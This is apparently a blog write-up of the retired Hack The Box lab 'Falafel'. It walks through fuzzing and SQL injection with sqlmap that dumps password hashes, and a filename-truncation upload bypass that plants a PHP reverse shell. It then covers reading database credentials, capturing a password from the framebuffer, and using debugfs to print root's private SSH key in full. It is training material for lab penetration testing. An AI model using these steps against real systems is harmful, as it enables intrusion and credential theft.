HTB – Falafel

Today we are going to solve another CTF challenge “falafel” which is available online for those who want to increase their skill in penetration testing and black box testing. Falafel is a retired vulnerable lab presented by hack the box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to expert level.

Level: Hard

Task: find user.txt & root.txt file on the victim’s machine

Since these labs are online available therefore they have static IP and its IP is 10.10.10.73 so let’s begin with nmap port enumeration.

c:\Users\jacco>nmap -sC -sV 10.10.10.73
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-02 14:26 W. Europe Summer Time
Nmap scan report for 10.10.10.73
Host is up (0.030s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 36:c0:0a:26:43:f8:ce:a8:2c:0d:19:21:10:a6:a8:e7 (RSA)
| 256 cb:20:fd:ff:a8:80:f2:a2:4b:2b:bb:e1:76:98:d0:fb (ECDSA)
|_ 256 c4:79:2b:b6:a9:b7:17:4c:07:40:f3:e5:7c:1a:e9:dd (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/*.txt
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Falafel Lovers
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.67 seconds

So we explored target IP through the web browser and it put up a login page shown.

Enumeration

With the information we got from robots.txt, let’s brute-force for some .txt files that might give some juicy information

root@kali:~# wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt --hc 404 -t 60 http://10.10.10.73/FUZZ.txt
********************************************************
* Wfuzz 2.1.5 - The Web Bruteforcer                      *
********************************************************

Target: http://10.10.10.73/FUZZ.txt
Total requests: 207643

==================================================================
ID	Response   Lines      Word         Chars          Request    
==================================================================

01347:  C=200      1 L	       4 W	     30 Ch	  "robots"
06064:  C=200     17 L	     120 W	    804 Ch	  "cyberlaw"

Total time: 2430.657
Processed Requests: 207625
Filtered Requests: 207610
Requests/sec.: 85.41926

Let’s check cyberlaw.txt

By reading this message, I conclude that there is an admin account and which is facing major security issue and an attacker can easily take over the website using an image upload feature. Moreover, there is some hint on the URL filter.

Then we could also fuzz for other usernames

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --sc 200 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID Response Lines Word Chars Payload 
==================================================================

000003: C=200 102 L 657 W 7074 Ch "Aaron"
000004: C=200 102 L 657 W 7074 Ch "Aartjan"
000005: C=200 102 L 657 W 7074 Ch "Abagael"
000006: C=200 102 L 657 W 7074 Ch "Abagail"
000007: C=200 102 L 657 W 7074 Ch "Abahri"
^C
Finishing pending requests...

root@kali:~/htb/falafel# wfuzz -c -w /usr/share/wordlists/wfuzz/others/names.txt --hw 657 -t 60 -d "username=FUZZ&password=PuckieStyle" http://10.10.10.73/login.php

********************************************************
* Wfuzz 2.3.3 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.73/login.php
Total requests: 8607

==================================================================
ID   Response   Lines      Word         Chars          Payload    
==================================================================

000065:  C=200    102 L	     659 W	   7091 Ch	  "Admin"
001488:  C=200    102 L	     659 W	   7091 Ch	  "Chris"

Total time: 37.51125
Processed Requests: 8607
Filtered Requests: 8605
Requests/sec.: 229.4511

The next thing that we can try is see if there is a SQL injection vulnerability. For test it, we can insert the following string as username:

and we press login button with random password. The web page answer is: Wrong identification: admin, Bbut we have not insert “admin” in login form → there is SQL injection!

 

Exploiting Web Application Vulnerabilities

Then we make more efforts for SQL injection by using SQLMAP and used “Wrong identification” as a string to be passed at the time of login.

c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel --tables --batch
___
__H__
___ ___[(]_____ ___ ___ {1.2.11.19#dev}
|_ -| . [,] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 14:59:45 /2019-04-02/

--snip--
back-end DBMS: MySQL 5
[14:59:46] [INFO] fetching tables for database: 'falafel'
[14:59:46] [INFO] fetching number of tables for database 'falafel'
[14:59:46] [INFO] resumed: 1
[14:59:46] [INFO] resumed: users
Database: falafel
[1 table]
+-------+
| users |
+-------+

[*] ending @ 14:59:46 /2019-04-02/
c:\SQLMAP>python sqlmap.py -u http://10.10.10.73/login.php --forms --level 5 --risk 3 --string "Wrong identification" -D falafel -T users --dump --batch
___
__H__
___ ___[']_____ ___ ___ {1.2.11.19#dev}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V |_| http://sqlmap.org

[*] starting @ 15:01:18 /2019-04-02/

[15:01:18] [INFO] testing connection to the target URL
--snip--
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: falafel
Table: users
[2 entries]
+----+--------+----------+----------------------------------+
| ID | role | username | password |
+----+--------+----------+----------------------------------+
| 1 | admin | admin | 0e462096931906507119562988736854 |
| 2 | normal | chris | d4ee02a22fc872e36d9e3751ba72ddc8 |
+----+--------+----------+----------------------------------+

[*] ending @ 15:01:19 /2019-04-02/

As you can observe that the password hash for user admin is started with 0 and I don’t know much about this type of hash, so we look in the Google and notice link for Magic hashes.

As you can observe the highlighted md5 hash for the 32-bit string is same as above……………………….

With help of the following credential we login into admin dashboard and move to upload options.

Here we are trying to upload a php file named shell.php but it put an error “Bad extension “as shown

Thereafter we renamed it as shell.php.png and again try to upload.

Ohh! Yes, the file with .png extension get uploaded successfully inside /var/www/html/uploads hence we can to upload a malicious php file or any php backdoor with .png extension.

Spawning Shell

Let’s create a PHP payload for uploading into the web site.

As shown in the given image the PHP file is uploaded successfully inside /var/www/html/uploads.

 

Trying filenames with very long names, I noticed the web app truncates the filename saved on the disk to a maximum of 236 characters.With this logic we can create a file with a 240 chars filename with the last 8 characters set to “.php.png”. Due to the behavior of the web app, it will truncate the last four characters “.png” which will leave us with a file having a “.php” file extension.

Sample filename:

verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png

Let’s prepare a php reverse shell with a loooong,loooong file name and host it using python SimpleHTTPServer

Root@kali:~/htb/falafel# python -m SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
10.10.10.73 - - [02/Apr/2019 10:10:20] "GET /verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php.png HTTP/1.1" 200 -

Triggering the reverse shell via curl:

root@kali:~/htb/falafel# curl "http://10.10.10.73/uploads/0402-1710_61cb5b7a8480bfc4/verylooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooong.php"

Netcat listener receiving the reverse shell connection:

root@kali:~/htb/falafel# nc -lvp 443
Ncat: Version 7.70 ( https://nmap.org/ncat )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.10.10.73.
Ncat: Connection from 10.10.10.73:53576.
Linux falafel 4.4.0-112-generic #135-Ubuntu SMP Fri Jan 19 11:48:36 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
17:14:07 up 1 day, 16:59, 2 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
yossi tty1 Mon00 40:59m 0.15s 0.09s -bash
moshe pts/0 10.10.14.20 15:21 1:52m 0.00s 0.00s -sh
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c "import pty; pty.spawn('/bin/bash')" 
www-data@falafel:/$

We open passwd file and notice two system username i.e. yossi and moshe.

www-data@falafel:/$ cd /var/www/html
cd /var/www/html
www-data@falafel:/var/www/html$ ls
ls
assets cyberlaw.txt images login_logic.php style.php
authorized.php footer.php index.php logout.php upload.php
connection.php header.php js profile.php uploads
css icon.png login.php robots.txt
www-data@falafel:/var/www/html$ cat connection.php 
cat connection.php
<?php
define('DB_SERVER', 'localhost:3306');
define('DB_USERNAME', 'moshe');
define('DB_PASSWORD', 'falafelIsReallyTasty');
define('DB_DATABASE', 'falafel');
$db = mysqli_connect(DB_SERVER,DB_USERNAME,DB_PASSWORD,DB_DATABASE);
// Check connection
if (mysqli_connect_errno())
{
echo "Failed to connect to MySQL: " . mysqli_connect_error();
}
?>
www-data@falafel:/var/www/html$

This is MySQL configuration file for MySQL where username is moshe and password is falafelIsReallyTasty

With help of above credential we are trying to ssh login and after making successful login we found the user.txt file from inside /home/moshe

PS C:\Users\jacco> ssh moshe@10.10.10.73
moshe@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr 2 15:21:50 2019 from 10.10.14.20
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
setterm: terminal xterm-256color does not support --blank
moshe@falafel:~$ ls
user.txt
moshe@falafel:~$ cat user.txt
c86*****9d3

After some more penetration, we enumerated the groups for user moshe and found that the user is in the video group. When we found uses as the member of the video group then for Privilege Escalation we need check frame-buffer device. Because this can lead a local user able to access a frame buffer device file (/dev/fb*) could possibly use this flaw to escalate their privileges on the system.

Let’s have the contents of /dev/fb0 with help of cat command to capture the framebuffer raw data inside /tmp directory as scree.raw

So we have captured the raw data inside /tmp, now you need to take the raw image and convert it to a standard image format say .png but we before that we need to find t the size, use the following command which will print the dimension……………..

Now enter the following command to convert raw data into a .png image format

Then we opened screen.png and got the following image which was showing password: MoshePlzStopHackingMe!for user Yossi.

With help of above-enumerated credential, we have made SSH login successfully and then run following command for getting SSH RSA key.

PS C:\Users\jacco> ssh yossi@10.10.10.73
yossi@10.10.10.73's password:
Welcome to Ubuntu 16.04.3 LTS (GNU/Linux 4.4.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

0 packages can be updated.
0 updates are security updates.


Last login: Tue Apr  2 15:16:20 2019 from 10.10.14.20
yossi@falafel:~$ groups
yossi adm disk cdrom dip plugdev lpadmin sambashare
yossi@falafel:~$ debugfs /dev/sda1
debugfs 1.42.13 (17-May-2015)
debugfs:  cat /root/.ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAyPdlQuyVr/L4xXiDVK8lTn88k4zVEEfiRVQ1AWxQPOHY7q0h
b+Zd6WPVczObUnC+TaElpDXhf3gjLvjXvn7qGuZekNdB1aoWt5IKT90yz9vUx/gf
v22+b8XdCdzyXpJW0fAmEN+m5DAETxHDzPdNfpswwYpDX0gqLCZIuMC7Z8D8Wpkg
BWQ5RfpdFDWvIexRDfwj/Dx+tiIPGcYtkpQ/UihaDgF0gwj912Zc1N5+0sILX/Qd
UQ+ZywP/qj1FI+ki/kJcYsW/5JZcG20xS0QgNvUBGpr+MGh2urh4angLcqu5b/ZV
dmoHaOx/UOrNywkp486/SQtn30Er7SlM29/8PQIDAQABAoIBAQCGd5qmw/yIZU/1
eWSOpj6VHmee5q2tnhuVffmVgS7S/d8UHH3yDLcrseQhmBdGey+qa7fu/ypqCy2n
gVOCIBNuelQuIAnp+EwI+kuyEnSsRhBC2RANG1ZAHal/rvnxM4OqJ0ChK7TUnBhV
+7IClDqjCx39chEQUQ3+yoMAM91xVqztgWvl85Hh22IQgFnIu/ghav8Iqps/tuZ0
/YE1+vOouJPD894UEUH5+Bj+EvBJ8+pyXUCt7FQiidWQbSlfNLUWNdlBpwabk6Td
OnO+rf/vtYg+RQC+Y7zUpyLONYP+9S6WvJ/lqszXrYKRtlQg+8Pf7yhcOz/n7G08
kta/3DH1AoGBAO0itIeAiaeXTw5dmdza5xIDsx/c3DU+yi+6hDnV1KMTe3zK/yjG
UBLnBo6FpAJr0w0XNALbnm2RToX7OfqpVeQsAsHZTSfmo4fbQMY7nWMvSuXZV3lG
ahkTSKUnpk2/EVRQriFjlXuvBoBh0qLVhZIKqZBaavU6iaplPVz72VvLAoGBANj0
GcJ34ozu/XuhlXNVlm5ZQqHxHkiZrOU9aM7umQkGeM9vNFOwWYl6l9g4qMq7ArMr
5SmT+XoWQtK9dSHVNXr4XWRaH6aow/oazY05W/BgXRMxolVSHdNE23xuX9dlwMPB
f/y3ZeVpbREroPOx9rZpYiE76W1gZ67H6TV0HJcXAoGBAOdgCnd/8lAkcY2ZxIva
xsUr+PWo4O/O8SY6vdNUkWIAm2e7BdX6EZ0v75TWTp3SKR5HuobjVKSht9VAuGSc
HuNAEfykkwTQpFTlmEETX9CsD09PjmsVSmZnC2Wh10FaoYT8J7sKWItSzmwrhoM9
BVPmtWXU4zGdST+KAqKcVYubAoGAHR5GBs/IXFoHM3ywblZiZlUcmFegVOYrSmk/
k+Z6K7fupwip4UGeAtGtZ5vTK8KFzj5p93ag2T37ogVDn1LaZrLG9h0Sem/UPdEz
HW1BZbXJSDY1L3ZiAmUPgFfgDSze/mcOIoEK8AuCU/ejFpIgJsNmJEfCQKfbwp2a
M05uN+kCgYBq8iNfzNHK3qY+iaQNISQ657Qz0sPoMrzQ6gAmTNjNfWpU8tEHqrCP
NZTQDYCA31J/gKIl2BT8+ywQL50avvbxcXZEsy14ExVnaTpPQ9m2INlxz97YLxjZ
FEUbkAlzcvN/S3LJiFbnkQ7uJ0nPj4oPw1XBcmsQoBwPFOcCEvHSrg==
-----END RSA PRIVATE KEY-----
debugfs:  cat /root/root.txt
23b*****fa1
debugfs:
Geplaatst op

Geef een reactie

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *